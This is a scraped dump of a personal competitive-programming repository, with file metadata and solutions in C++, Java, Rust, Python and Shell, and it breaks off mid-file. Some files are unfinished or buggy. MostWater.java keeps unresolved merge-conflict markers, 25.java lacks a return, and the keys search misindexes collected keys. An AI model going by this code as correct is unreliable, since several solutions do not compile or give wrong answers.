"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\nconst int dx[4] = { -1, 0, 1, 0 };\nconst int dy[4] = { 0, 1, 0, -1 };\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n queue<tuple<int, int, int>> q;\n int d[303][303][65];\n bool inside(int x, int y, int m, int n) {\n return (x >= 0 && x < m && y >= 0 && y < n);\n }\n int shortestPathAllKeys(vector<string>& grid) {\n auto numberOfKey = 0;\n rep(i, 0, grid.size(), 1)\n rep(j, 0, grid[i].length(), 1) \n if (grid[i][j] == '&') {\n d[i][j][0] = 1;\n q.push(make_tuple(i, j, 0));\n } else if (grid[i][j] >= 'a' && grid[i][j] <= 'f')\n numberOfKey += 1;\n \n while (!q.empty()) {\n auto u = q.front();\n q.pop();\n auto x = get<0>(u);\n auto y = get<1>(u);\n auto c = get<2>(u);\n if (c == (1 << numberOfKey) - 1)\n return d[x][y][c] - 1;\n rep(i, 0, 4, 1) {\n auto x1 = x + dx[i];\n auto y1 = y + dy[i];\n //outside the box, next item\n if (!inside(x1, y1, grid.size(), grid[0].length())) continue;\n //hit the wall, next item\n if (grid[x1][y1] == '#') continue;\n //hit the lock\n if (grid[x1][y1] >= 'A' && grid[x1][y1] <= 'F') {\n // if dont have key\n if ((c & (1 << (grid[x1][y1] - 'A'))) == 0)\n continue;\n }\n auto c1 = c;\n // ifhit the key, collect the key\n if (grid[x1][y1] >= 'a' && grid[x1][y1] <= 'f')\n c1 = c | (1 << (grid[x1][y1] - 'A'));\n\n if (d[x1][y1][c1] != 0)\n continue;\n d[x1][y1][c1] = d[x][y][c] + 1;\n q.push(make_tuple(x1, y1, c1));\n }\n }\n return -1;\n }\n};\n\nint main() {\n\n}"
},
{
"alpha_fraction": 0.4216725528240204,
"alphanum_fraction": 0.43934041261672974,
"avg_line_length": 23.285715103149414,
"blob_id": "a0d81ea00278fbb2aa9e1821ffd854f40de69c7c",
"content_id": "bffd99240747e2ac3c9883429fcb5df8e5a1b3ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 849,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 35,
"path": "/leetcode/19.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(): val(0), next(nullptr) {}\n ListNode(int x): val(x), next(nullptr) {}\n ListNode(int x, ListNode *next): val(x), next(next) {}\n};\n\nclass Solution {\n public:\n ListNode* removeNthFromEnd(ListNode* head, int n) {\n ListNode* p1 = head;\n ListNode* p2 = nullptr;\n int cnt{0};\n while (true) {\n \n if (cnt == n)\n p2 = head;\n if (p1 -> next == nullptr)\n break;\n cnt += 1;\n p1 = p1 -> next;\n if (p2 != nullptr)\n p2 = p2 -> next;\n }\n if (p2 != nullptr)\n p2 -> next = (p2 -> next) -> next;\n else\n head = head -> next;\n return head;\n }\n};"
},
{
"alpha_fraction": 0.4052478075027466,
"alphanum_fraction": 0.426384836435318,
"avg_line_length": 28.191490173339844,
"blob_id": "d5d54c5f56a873e91e97657e4d779296efc303f2",
"content_id": "82f77c522bdfd4136c4a2f889f09d1a9b4e856b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1372,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 47,
"path": "/leetcode/add_two_number.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(): val(0), next(nullptr) {}\n ListNode(int x): val(x), next(nullptr) {}\n ListNode(int x, ListNode* next): val(x), next(next) {}\n};\n\nclass Solution {\n public:\n ListNode* addTwoNumbers(ListNode* l1, ListNode* l2) {\n ListNode* res = new ListNode();\n ListNode* h = res;\n int carry(0);\n while (l1 != nullptr || l2 != nullptr) {\n int val1 = l1 == nullptr ? 0 : l1 -> val; \n int val2 = l2 == nullptr ? 0 : l2 -> val;\n int temp = val1 + val2 + carry;\n carry = temp / 10;\n h -> val = temp % 10;\n h -> next = new ListNode();\n h = h -> next;\n if (l1 != nullptr) l1 = l1 -> next;\n if (l2 != nullptr) l2 = l2 -> next;\n }\n if (carry > 0)\n h -> val = carry;\n else\n h -> val = -1;\n\n h = res;\n while ((h -> next) -> val != -1) \n h = h -> next;\n h -> next = nullptr;\n return res;\n }\n};\nint main() {\n}\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 8,
"blob_id": "75cce18ae090ffeabe251c9a4f436cf3adeea275",
"content_id": "465c78590e737e9c50b9078d2062ea8c106f9bfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 36,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 4,
"path": "/bash/hackerrank/tail.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#tail1\ntail -n 20\n#tail2\ntail -c 20\n"
},
{
"alpha_fraction": 0.5351351499557495,
"alphanum_fraction": 0.5772972702980042,
"avg_line_length": 27.59375,
"blob_id": "30524b6543769277f9149ebdff8386db49ec9832",
"content_id": "d621af53c3a1526e62369ae7000ec5f2b2a0d2c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 925,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 32,
"path": "/leetcode/MostWater.java",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "<<<<<<< HEAD\nimport java.util.stream.IntStream;\n\npublic class MostWater {\n public int maxArea(int[] height) {\n int res = 0;\n IntStream.range(0, height.length)\n .forEach(i -> {\n IntStream.range(0, height.length).forEach(j -> {res = 1;});\n });\n //.forEach(j -> res = Math.max(res, Math.abs(i - j) * Math.min(height[i], height[j]))));\n return res;\n }\n\n public static void main(String[] args) {\n var myClass = new MostWater();\n myClass.maxArea(IntStream.range(0, 10).toArray());\n }\n=======\nimport java.util.stream.IntStream;\r\n\r\npublic class MostWater {\r\n private int res = 0;\r\n public int maxArea(int[] height) {\r\n }\r\n\r\n public static void main(String[] args) {\r\n var myClass = new MostWater();\r\n System.out.println(myClass.maxArea(new int[] {1,8,6,2,5,4,8,3,7 }));\r\n }\r\n>>>>>>> ab9b0d586098bc648496ece1c2e6bb61f2dcf16d\n}"
},
{
"alpha_fraction": 0.34226804971694946,
"alphanum_fraction": 0.3587628901004791,
"avg_line_length": 22.299999237060547,
"blob_id": "17fcdf58c5f49aa6069f2e0799522132b240b22c",
"content_id": "2e90ccd989f3f886e8e1dc253c8cd3bf01ae67e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 40,
"path": "/katis/ballotboxes.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int NMAX = 5e5 + 3;\r\nint n, b, a[NMAX];\r\n//----------------------------------------\r\nbool check(int x) {\r\n int cnt = 0;\r\n rep(i, 1, n) \r\n cnt += (a[i] - 1) / x + 1;\r\n return (cnt <= b);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n int l = 1, r = 5e6, res = 0;\r\n while (l <= r) {\r\n int mid = (l + r) / 2;\r\n if (check(mid)) {\r\n res = mid;\r\n r = mid - 1;\r\n }\r\n else l = mid + 1;\r\n }\r\n cout << res << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n while (cin >> n >> b) {\r\n if (n == -1) break;\r\n rep(i, 1, n) cin >> a[i];\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.358134925365448,
"alphanum_fraction": 0.3730158805847168,
"avg_line_length": 23.0238094329834,
"blob_id": "0448d5110a3f957b1ae7b53c18f58ec52319b39a",
"content_id": "23e616eb9ecfaf711bf0d296d0a8190fe61d0864",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1008,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 42,
"path": "/leetcode/longest_valid_parentheses_2.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\n public:\n int longestValidParentheses(string s) {\n int left = 0, right = 0, res = 0; \n for (char chr: s) {\n if (chr == '(') \n left += 1;\n else\n right += 1;\n if (left == right) \n res = max(res, left * 2);\n if (left < right) {\n left = 0;\n right = 0;\n }\n }\n\n left = 0; right = 0;\n for (char chr: string(s.rbegin(), s.rend())) {\n if (chr == '(')\n left += 1;\n else\n right += 1;\n if (left == right)\n res = max(res, left * 2);\n if (left > right) {\n left = 0;\n right = 0;\n }\n }\n return res;\n }\n};\n\nint main() {\n Solution a = Solution();\n cout << a.longestValidParentheses(\"(()\");\n cout << a.longestValidParentheses(\"(())\");\n}"
},
{
"alpha_fraction": 0.4853448271751404,
"alphanum_fraction": 0.4991379380226135,
"avg_line_length": 20.10909080505371,
"blob_id": "165e07a63ebcdbf53673d25cef565fff0a80ac90",
"content_id": "259c9d5295f0be4e27cfa088fb2e6d0346587461",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 55,
"path": "/leetcode/topk_frequent.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\npublic:\n\tmap<int, int> m;\n\tvector<int> ds;\n\tvector<int> res;\n\tvoid quick_select(int l, int r, int top_select) {\n\t\tif (l >= r) return;\n\t\tif (top_select == 0)\n\t\t\treturn;\n\t\tif (l + 1 == r) {\n\t\t\tres.push_back(ds[l]);\n\t\t\treturn;\n\t\t}\n\t\tint i = l, j = r - 1;\n\t\tint pivot = m[ds[(l + r) / 2]];\n\t\twhile (i <= j) {\n\t\t\twhile (i < r && m[ds[i]] > pivot) i++;\n\t\t\twhile (j >= l && m[ds[j]] < pivot) j--;\n\t\t\tif (i <= j) {\n\t\t\t\tswap(ds[i], ds[j]);\n\t\t\t\ti++; j--;\n\t\t\t}\n\t\t}\n\t\tif (j - l + 1 == top_select) {\n\t\t\tres.insert(res.begin(), ds.begin() + l, ds.begin() + j + 1);\n\t\t} else if (top_select > j - l + 1) {\n\t\t\tres.insert(res.begin(), ds.begin() + l, ds.begin() + j + 1);\n\t\t\tquick_select(j + 1, r, top_select - (j - l + 1));\n\t\t} else {\n\t\t\tquick_select(l, j + 1, top_select);\n\t\t} \n\t}\n\n\tvector<int> topKFrequent(vector<int> nums, int k) {\n\t\tfor (auto num: nums) {\n\t\t\tm[num] += 1;\t\n\t\t\tif (m[num] == 1) \n\t\t\t\tds.push_back(num);\n\t\t}\n\t\tquick_select(0, ds.size(), k);\n\t\treturn res;\n\t}\n};\n\n\nint main() {\n\tSolution a = Solution();\n\tvector<int> v = {1};\n\tauto r = a.topKFrequent(v, 1);\n\tfor (auto x: r) \n\t\tcout << x << \" \";\n}"
},
{
"alpha_fraction": 0.3578363358974457,
"alphanum_fraction": 0.36754506826400757,
"avg_line_length": 19.909090042114258,
"blob_id": "649c1ddf3461e3c15846395509a267f46e75a299",
"content_id": "b4b53150eba350bcd51a34c697a9792e62f76c44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 721,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 33,
"path": "/katis/aboveaverage.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\nint n;\r\nvector<int> a;\r\n\r\n\r\n//----------------------------------------\r\nvoid process() {\r\n int cnt = 0, sum = 0;\r\n for (auto x: a) sum += x;\r\n for (auto x:a) cnt += x * a.size() > sum;\r\n\r\n printf(\"%.3f%%\\n\", float(cnt) / a.size() * 100);\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int test, u;\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n cin >> test;\r\n while (test--) {\r\n cin >> n;\r\n a.clear();\r\n rep(i, 1, n) {\r\n cin >> u;\r\n a.push_back(u);\r\n }\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.35300207138061523,
"alphanum_fraction": 0.36542442440986633,
"avg_line_length": 21.609756469726562,
"blob_id": "963d44582b364aad713dddeb881ac9ce6e9ba6c8",
"content_id": "a56d414f799655c58e36974be867a43ebcde9bee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 966,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 41,
"path": "/katis/sylvester.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nll n, x, y, w, h;\r\n//----------------------------------------\r\nint getItem(ll n, ll px, ll py) {\r\n int cnt = 1; ll si = n;\r\n while (si != 1) {\r\n if (px >= si/2 && py >= si/2) cnt *= -1;\r\n px %= si/2; py %= si/2;\r\n si /= 2;\r\n }\r\n\r\n return cnt;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n rep(i, 0, h - 1) {\r\n rep(j, 0, w - 1)\r\n cout << getItem(n, y + i, x + j) << \" \";\r\n cout << endl;\r\n }\r\n cout << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n int testCase;\r\n cin >> testCase;\r\n while (testCase--) {\r\n cin >> n >> x >> y >> w >> h;\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.5385621190071106,
"alphanum_fraction": 0.543790876865387,
"avg_line_length": 33.727272033691406,
"blob_id": "74bcfbe09bd101e67a216502d48fa76314df3d46",
"content_id": "729e3dd7e4fdbc311fc1c0a7515485e260163f89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 765,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 22,
"path": "/leetcode/38.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <string>\n#include <algorithm>\n\nusing namespace std;\n\nclass Solution {\n public:\n string countAndSay(int n) {\n if (n == 1) return \"1\";\n string previousSay = countAndSay(n - 1);\n auto firstIter = previousSay.begin();\n string res = \"\";\n while (firstIter != previousSay.end()) {\n auto differentCharacterIter = find_if(firstIter, previousSay.end(), [firstIter](char x) { return x != *firstIter; });\n string substr;\n copy(firstIter, differentCharacterIter, back_inserter(substr));\n res = res + to_string(substr.length()) + substr[0];\n firstIter = differentCharacterIter;\n }\n return res;\n }\n};\n\n"
},
{
"alpha_fraction": 0.5101265907287598,
"alphanum_fraction": 0.5151898860931396,
"avg_line_length": 28.296297073364258,
"blob_id": "648808bedcca73e3f9d3ba92d8c22deedc2aa328",
"content_id": "a883bb3bceb6788629b7265f5e735cafdf93f718",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 790,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 27,
"path": "/leetcode/25.java",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "class ListNode {\n int val;\n ListNode next;\n ListNode() {}\n ListNode(int val) { this.val = val; }\n ListNode(int val, ListNode next) { this.val = val; this.next = next; }\n}\n\nclass Solution {\n public ListNode reverseKGroup(ListNode head, int k) {\n ListNode endOfPreviousSegment = null, curr = head, next, startOfThisSegment = null;\n int cnt = 0;\n while (curr != null) {\n cnt += 1;\n next = curr.next; \n curr.next = startOfThisSegment;\n if (cnt == 1)\n startOfThisSegment = curr;\n curr = next;\n if (cnt == k) {\n cnt = 0;\n endOfPreviousSegment.next = startOfThisSegment;\n endOfPreviousSegment = curr;\n }\n }\n }\n}"
},
{
"alpha_fraction": 0.45132744312286377,
"alphanum_fraction": 0.5044247508049011,
"avg_line_length": 20.25,
"blob_id": "a1c15bc5e9ec243c743e8970b0601cccb174e8fd",
"content_id": "8ce92f24c5af527b418979c1897c4a81409cc0e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 339,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 16,
"path": "/codewars/sum_numbers.py",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "def sum_arrangements(num):\n num_str = str(num)\n sum_a = sum([int(x) for x in num_str])\n gt = 1\n mu_10 = 1\n res = 0\n for (i, x) in enumerate(num_str):\n res += sum_a * mu_10\n mu_10 *= 10\n if i != 0:\n gt *= i\n \n return res * gt\n\nprint(sum_arrangements(89))\nprint(sum_arrangements(1185))"
},
{
"alpha_fraction": 0.5084033608436584,
"alphanum_fraction": 0.5630252361297607,
"avg_line_length": 22.799999237060547,
"blob_id": "5657719fc07055aa2a0056bb42961615e2ac4d7c",
"content_id": "d13e9e647f4f97d2586c8b572786f7fa5ce1bccb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 238,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 10,
"path": "/init/test.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nvector<vector<pair<int, int>>> ds(103);\nvector<int> dis (103, -1);\nint main() {\n vector<vector<pair<int, int>>> ds(103);\n for (int i = 0; i < 10; i++)\n cout << dis[i] << endl;\n}\n"
},
{
"alpha_fraction": 0.3412625789642334,
"alphanum_fraction": 0.35590118169784546,
"avg_line_length": 18.27777862548828,
"blob_id": "15b80ae4c2689230010ce6d67a862c20396ee147",
"content_id": "c6a20c6c70764b1698a0f388335b48df033759f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1093,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 54,
"path": "/katis/deduplicatingfiles.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for(auto i = a; i <= b; i++)\r\n\r\nint n;\r\nint h[257];\r\nset<string> b;\r\nmap<string, int> m;\r\n\r\n//----------------------------------------\r\nint hashString(string s) {\r\n int res = 0;\r\n for (auto x: s) {\r\n res ^= (int(x));\r\n }\r\n\r\n return res;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n string s;\r\n memset(h, 0, sizeof(h));\r\n b.clear();\r\n m.clear();\r\n int sub = 0;\r\n\r\n cin.ignore();\r\n rep(i, 1, n) {\r\n getline(cin, s);\r\n h[hashString(s)]++;\r\n b.insert(s);\r\n if (m.find(s) == m.end())\r\n m[s] = 1;\r\n else {\r\n sub += m[s];\r\n m[s]++;\r\n }\r\n } \r\n\r\n int totalCollide = 0;\r\n rep(i, 0, 255) \r\n totalCollide += (h[i] * (h[i] - 1)) / 2;\r\n\r\n cout << b.size() << \" \" << totalCollide - sub << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n while (cin >> n) {\r\n if (n == 0) break;\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.4347181022167206,
"alphanum_fraction": 0.4658753573894501,
"avg_line_length": 20.74193572998047,
"blob_id": "9db9e2b3d762a8dba5f9ac637ca01089829f2166",
"content_id": "1ce4f6e8d0175062425a54b87c3e225207b1c70d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Rust",
"length_bytes": 674,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 31,
"path": "/leetcode/26.rs",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "use std::convert::TryInto;\n\nstruct Solution;\n\nimpl Solution {\n pub fn remove_duplucates(nums: &mut Vec<i32>) -> i32 {\n if nums.len() == 0 {\n return 0;\n }\n let mut cnt = 1;\n for i in 0..nums.len() - 1 {\n if nums[i] != nums[i + 1] {\n nums[cnt] = nums[i + 1];\n cnt += 1;\n }\n } \n return cnt.try_into().unwrap();\n }\n}\n\nfn main() {\n let mut nums = vec![2, 7, 7, 8];\n let res = Solution::remove_duplucates(&mut nums);\n println!(\"{}\", res);\n}\n\n#[test]\nfn test() {\n let mut nums = vec![2, 7, 7, 8];\n assert_eq!(Solution::remove_duplucates(&mut nums), 3);\n}\n"
},
{
"alpha_fraction": 0.3529614210128784,
"alphanum_fraction": 0.3712121248245239,
"avg_line_length": 23.252174377441406,
"blob_id": "c3248077af2bc27a951026840107d7c0b8b13c65",
"content_id": "64fb4fb571d3b3871fecd3e3ec382ab318e64154",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2904,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 115,
"path": "/katis/cross.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n\r\nchar sudoku[12][12];\r\ntypedef pair<int, int> position;\r\n//----------------------------------------\r\nvoid openf() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n rep(i, 0, 8)\r\n rep(j, 0, 8) {\r\n cin >> sudoku[i][j];\r\n\t\t}\r\n}\r\n//----------------------------------------\r\nint getSquare(int i, int j) {\r\n return i / 3 * 3 + j / 3;\r\n}\r\n//----------------------------------------\r\nposition getPosition(int value) {\r\n // initialize rows, cols, squares\r\n set<int> rows, cols, squares;\r\n vector<position> res;\r\n res.clear();\r\n\trows.clear();\r\n\tcols.clear();\r\n\tsquares.clear();\r\n\r\n rep(i, 0, 8) {\r\n rows.insert(i);\r\n cols.insert(i);\r\n squares.insert(i);\r\n }\r\n\r\n rep(i, 0, 8)\r\n rep(j, 0, 8)\r\n if (sudoku[i][j] == '0' + value) {\r\n if (rows.find(i) != rows.end()) \r\n rows.erase(i);\r\n else \r\n return position(-1, -1);\r\n\r\n if (cols.find(j) != cols.end())\r\n cols.erase(j);\r\n else\r\n return position(-1, -1);\r\n if (squares.find(getSquare(i, j)) != squares.end())\r\n squares.erase(getSquare(i, j));\r\n else \r\n return position(-1, -1);\r\n }\r\n\t\r\n\tif (squares.empty()) \r\n\t\treturn position(-3, -3);\r\n \r\n for (auto square:squares) {\r\n\t\tres.clear();\r\n auto srow = square / 3;\r\n auto scol = square % 3;\r\n rep(i, srow * 3, srow * 3 + 2)\r\n rep(j, scol * 3, scol * 3 + 2) {\r\n if (rows.find(i) != rows.end() && cols.find(j) != cols.end() && sudoku[i][j] == '.')\r\n res.push_back(position(i, j));\r\n }\r\n if (res.size() == 0)\r\n return position(-1, -1);\r\n else if (res.size() == 1)\r\n return res[0];\r\n } \r\n\treturn position(-2, -2);\r\n}\r\n//----------------------------------------\r\nvoid write() {\r\n\trep(i, 0, 8) {\r\n\t\trep(j, 0, 8)\r\n\t\t\tcout << sudoku[i][j];\r\n\t\tcout << endl;\r\n\t}\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n\tset<int> g;\r\n\trep(i, 1, 9)\r\n\t\tg.insert(i);\r\n\r\n while (true) {\r\n bool stop = true;\r\n\t\tif (g.empty()) break;\r\n rep(i, 1, 9) {\r\n\t\t\tif (g.find(i) == g.end()) \r\n\t\t\t\tcontinue;\r\n auto p = getPosition(i);\r\n if (p.first == -1) {\r\n cout << \"ERROR\";\r\n return;\r\n } else if (p.first == -3) {\r\n\t\t\t\tstop = false;\r\n\t\t\t\tg.erase(i);\r\n\t\t\t}\r\n\t\t\telse if (p.first != -2) {\r\n sudoku[p.first][p.second] = '0' + i;\r\n stop = false;\r\n }\r\n }\r\n if (stop) break;\r\n }\r\n\r\n\twrite();\r\n}\r\n//----------------------------------------\r\nint main() {\r\n openf();\r\n process();\r\n}\r\n"
},
{
"alpha_fraction": 0.3989361822605133,
"alphanum_fraction": 0.40780141949653625,
"avg_line_length": 23.066667556762695,
"blob_id": "709f9b93c2eb34a156c743bc6af7bc6419790961",
"content_id": "767ae83e38e0e73be992ea90bb4373ff0c1f7162",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1128,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 45,
"path": "/katis/permutationencryption.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define fori(i, a, b) for (int i = a; i <= b; i++)\r\nint n, perArray[23];\r\nstring message; \r\n//----------------------------------------\r\nvoid openf() {\r\n char ch;\r\n fori(i, 0, n - 1)\r\n cin >> perArray[i]; \r\n\tcin.ignore();\r\n getline(cin, message);\r\n}\r\n//----------------------------------------\r\nstring encryptMessage(string subMessage) {\r\n string res = \"\";\r\n fori(i, 0, n - 1)\r\n res += subMessage[perArray[i] - 1];\r\n return res;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n while (message.length() % n != 0)\r\n message += ' ';\r\n cout << \"'\";\r\n int i = 0;\r\n while (i < message.length()) {\r\n string subMessage = message.substr(i, n);\r\n cout << encryptMessage(subMessage);\r\n i += n;\r\n }\r\n cout << \"'\" << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n bool firstTime = true;\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n // freopen(\"test.out\", \"w\", stdout);\r\n while (cin >> n) {\r\n if (n == 0) break;\r\n openf();\r\n process();\r\n }\r\n}\r\n"
},
{
"alpha_fraction": 0.3467455506324768,
"alphanum_fraction": 0.36449703574180603,
"avg_line_length": 20.289474487304688,
"blob_id": "3b5ab1b899798e33e2943ce0cf10d5b80353f548",
"content_id": "733453bb3a19a011bfa9e6f1076f478939635288",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 845,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 38,
"path": "/katis/luckynumbers.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\nint n, res = 0;\r\nvector<int> a;\r\n//----------------------------------------\r\nbool validState(int i, int scs) {\r\n int tmp = 0;\r\n for (auto x: a) \r\n tmp = (tmp * 10 + x) % scs;\r\n return (tmp * 10 + i) % scs == 0;\r\n}\r\n//----------------------------------------\r\nvoid gen(int scs) {\r\n if (scs == n + 1) {\r\n res += 1;\r\n return;\r\n }\r\n\r\n rep(i, 0, 9) \r\n if (!(scs == 1 && i == 0) && validState(i, scs)) {\r\n a.push_back(i);\r\n gen(scs + 1);\r\n a.pop_back();\r\n }\r\n}\r\n//----------------------------------------\r\nint main() {\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n cin >> n;\r\n gen(1);\r\n cout << res;\r\n}"
},
{
"alpha_fraction": 0.44463446736335754,
"alphanum_fraction": 0.4805472493171692,
"avg_line_length": 25.845237731933594,
"blob_id": "e0f5154c3440b7419f7fb819622b8e85cdda9891",
"content_id": "52aa4a92aa8cd0b330f55dc45d5a033f61db05f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2339,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 84,
"path": "/leetcode/medianSortedArray.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nclass Solution {\r\n\tpublic:\r\n\t\tdouble findMedianSortedArrays(vector<int>& nums1, vector<int>& nums2) {\r\n\t\t\tint totalSize = nums1.size() + nums2.size();\r\n\t\t\tbool ok = false;\r\n\t\t\t//int v = findMedian(nums2, nums1, (totalSize + 1)/ 2, ok);\r\n\t\t\t//cout << v << endl;\r\n\t\t\t//return 0;\r\n\t\t\tint u = findMedian(nums1, nums2, totalSize / 2 + 1, ok);\r\n\t\t\tcout << \"1u \" << u << endl;\r\n\t\t\tif (!ok) \r\n\t\t\t\tu = findMedian(nums2, nums1, totalSize / 2 + 1, ok);\r\n\t\t\tcout << \"2u \" << u << endl;\r\n\t\t\tok = false;\r\n\t\t\tint v = findMedian(nums1, nums2, (totalSize + 1)/ 2, ok);\r\n\t\t\tcout << \"1v \" << v << endl;\r\n\t\t\tif (!ok) \r\n\t\t\t\tv = findMedian(nums2, nums1, (totalSize + 1)/ 2, ok);\r\n\t\t\tcout << \"2v \" << v << endl;\r\n\t\t\tcout << u << \" \" << v << 